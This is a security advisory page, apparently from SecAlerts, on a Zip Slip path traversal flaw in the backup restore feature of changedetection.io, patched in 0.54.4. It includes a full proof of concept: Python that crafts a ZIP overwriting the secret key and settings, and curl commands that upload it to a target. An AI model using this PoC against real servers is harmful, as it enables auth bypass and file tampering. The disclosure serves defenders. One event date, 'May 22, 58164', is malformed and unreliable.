CVE-2026-29065: changedetection.io: Zip Slip vulnerability in the backup restore functionality

Published Mar 4, 2026
·
Updated

Summary A Zip Slip vulnerability in the backup restore functionality allows arbitrary file overwrite via path traversal in uploaded ZIP archives.

Details

A Zip Slip vulnerability in the backup restore functionality allows arbitrary file overwrite via path traversal in uploaded ZIP archives. The application uses zipfile.extractall() without validating entry paths, allowing ../ sequences to escape the extraction directory.

Vulnerable Code (lines 50-53): def restorebackup(self, filename): with zipfile.ZipFile(filename, 'r') as zipref: # VULNERABLE: No path validation before extraction zipref.extractall(self.datastorepath) The extractall() function preserves the relative paths stored within the ZIP archive. When a malicious ZIP contains entries with ../ path traversal sequences, these files are extracted outside the intended directory.

| Path in ZIP | Target File | Impact | | --- | --- | --- | | ../secret.txt | Flask secret key | Session forgery, auth bypass | | ../changedetection.json | App settings | Disable password, inject backdoor | | ../url-watches.json | Watch index | Inject malicious watches | | ../{uuid}/watch.json | Watch config | Modify any watch |

Attacker uploads ZIP via the backup restore functionality at /backups/restore Application extracts files without validation, writing attacker content to sensitive locations

PoC

Step 1: Create Malicious ZIP import zipfile import json

with zipfile.ZipFile("zipslip.zip", "w") as zf: # Escape extraction directory with ../ zf.writestr("../secret.txt", "ATTACKER-CONTROLLED-SECRET") zf.writestr("../changedetection.json", json.dumps({ "settings": {"application": {"password": ""}} })) zf.writestr("../pwned-uuid-1234/watch.json", json.dumps({ "url": "https://attacker.com/zipslip-pwned", "title": "🔴 ZIPSLIP-PROOF" })) Step 2: Upload via Restore Endpoint

curl -X POST "http://target:5000/backups/restore/start" \ -F "zipfile=@zipslip.zip" \ -F "includewatches=y" \ -F "includesettings=y"

###Step 3: Verify Path Traversal Check if watch escaped to /datastore/ ###ls -la /datastore/ Look for: pwned-uuid-1234/

Verify in UI curl "http://target:5000/" | grep "ZIPSLIP"

<img width="1920" height="1080" alt="fcBHEuvFcXsOiI-pcj1wJ9yzKCRM" src="https://github.com/user-attachments/assets/889e7d2b-b5fe-4658-aa88-e57995860d38" />

Other sources

changedetection.io is a free open source web page change detection tool. Prior to version 0.54.4, a Zip Slip vulnerability in the backup restore functionality allows arbitrary file overwrite via path traversal in uploaded ZIP archives. This issue has been patched in version 0.54.4.

MITRE

Affected Software

2 affected componentsFixes available
pip/changedetection.io<=0.54.3
0.54.4
Webtechnologies Changedetection<0.54.4

Event History

Mar 4, 2026
Advisory Published
via GitHub·09:28 PM
Data Sourced
via GitHub·09:28 PM
DescriptionWeaknessAffected Software
Mar 6, 2026
CVE Published
via MITRE·06:54 AM
Data Sourced
via MITRE·06:54 AM
DescriptionWeakness
Data Sourced
via NVD·07:16 AM
DescriptionSeverityWeakness
Data Sourced
via NVD·07:16 AM
RemedyAffected Software
May 22, 58164
Event
via FIRST·04:45 PM
Free Weekly Intel

Don't miss critical vulnerabilities

Join thousands of security professionals who receive our weekly digest of trending CVEs, zero-days, and exploited vulnerabilities.

No spam. Unsubscribe anytime.

Frequently Asked Questions

1

What is the severity of CVE-2026-29065?

CVE-2026-29065 is classified as a high severity vulnerability due to its potential for arbitrary file overwrites.

2

How do I fix CVE-2026-29065?

To fix CVE-2026-29065, upgrade to version 0.54.4 or later of the affected package changedetection.io.

3

What is a Zip Slip vulnerability in CVE-2026-29065?

A Zip Slip vulnerability allows attackers to exploit path traversal in ZIP archives to overwrite arbitrary files on the server.

4

Which versions of changedetection.io are affected by CVE-2026-29065?

Versions up to and including 0.54.3 of changedetection.io are affected by CVE-2026-29065.

5

What functionality does CVE-2026-29065 affect?

CVE-2026-29065 affects the backup restore functionality of changedetection.io.

Contact

SecAlerts Pty Ltd.
132 Wickham Terrace
Fortitude Valley,
QLD 4006, Australia
info@secalerts.co
By using SecAlerts services, you agree to our services end-user license agreement. This website is safeguarded by reCAPTCHA and governed by the Google Privacy Policy and Terms of Service. All names, logos, and brands of products are owned by their respective owners, and any usage of these names, logos, and brands for identification purposes only does not imply endorsement. If you possess any content that requires removal, please get in touch with us.
© 2026 SecAlerts Pty Ltd.
ABN: 70 645 966 203, ACN: 645 966 203